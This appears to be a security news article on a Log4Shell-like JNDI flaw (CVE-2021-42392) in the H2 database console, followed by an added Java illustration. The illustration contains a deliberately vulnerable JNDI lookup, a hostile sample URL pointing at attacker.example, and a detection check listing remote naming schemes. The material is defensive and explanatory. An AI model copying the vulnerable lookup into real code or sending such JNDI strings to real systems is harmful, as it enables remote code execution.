New Log4Shell-like vulnerability impacts H2 Java SQL database

Researchers have warned of a new, critical Java flaw in the console of the popular H2 Java SQL database that shares its root cause with the Log4Shell vulnerability in Apache Log4j. According to JFrog, the issue carries a critical risk of unauthenticated remote code execution (RCE) for certain deployments, and affected organizations should update their H2 databases immediately.

H2 vulnerability root cause similar to Log4Shell, narrower exploitation scope

Like Log4Shell, the flaw (CVE-2021-42392) stems from Java Naming and Directory Interface (JNDI) remote class loading: an attacker who can insert a malicious URL into a JNDI lookup can make the JVM fetch and instantiate an attacker-controlled class, resulting in RCE, JFrog researchers explained in a blog post.
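The following is an added illustration of the generic vulnerable pattern described above, not code from H2 or from JFrog's write-up: a caller-supplied string passed straight into a JNDI lookup, beside a gated version that only resolves names on an application-defined allowlist. The class name, the allowlist entry and the sample hostile input are all constructed for the example.

```java
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.util.Locale;
import java.util.Set;

/**
 * Illustrative only (not H2's code): the difference between handing an
 * untrusted name to JNDI and gating it first.
 */
public class JndiLookupDemo {

    // Hypothetical allowlist of JNDI names this application legitimately resolves.
    private static final Set<String> ALLOWED = Set.of("java:comp/env/jdbc/appDb");

    /** Vulnerable pattern: the lookup name is attacker-controlled. */
    static Object vulnerableLookup(String untrustedName) throws NamingException {
        // A name such as "ldap://attacker.example/a" makes the JNDI client contact
        // that server; if the returned reference carries a remote codebase and the
        // JVM trusts it, an attacker-supplied class is loaded and instantiated.
        return new InitialContext().lookup(untrustedName);
    }

    /** Hardened pattern: resolve only names the application itself defines. */
    static Object safeLookup(String untrustedName) throws NamingException {
        if (untrustedName == null || !ALLOWED.contains(untrustedName)) {
            throw new IllegalArgumentException("JNDI name not allowed: " + untrustedName);
        }
        return new InitialContext().lookup(untrustedName);
    }

    /** Cheap structural check for a name that points at a remote naming service. */
    static boolean looksRemote(String name) {
        String n = name.toLowerCase(Locale.ROOT).trim();
        return n.startsWith("ldap://") || n.startsWith("ldaps://")
            || n.startsWith("rmi://") || n.startsWith("dns://")
            || n.startsWith("iiop://");
    }

    public static void main(String[] args) {
        // Constructed hostile input of the kind the article describes.
        String hostile = "ldap://attacker.example:1389/a";
        System.out.println("looksRemote(" + hostile + ") = " + looksRemote(hostile));
        try {
            safeLookup(hostile);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The allowlist is the real control; `looksRemote` is only a quick triage check and should not be relied on alone, since JNDI names can be routed through providers that do not use these URL prefixes. Patching H2 remains the primary fix; the example shows the class of bug, not the specific H2 code path.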
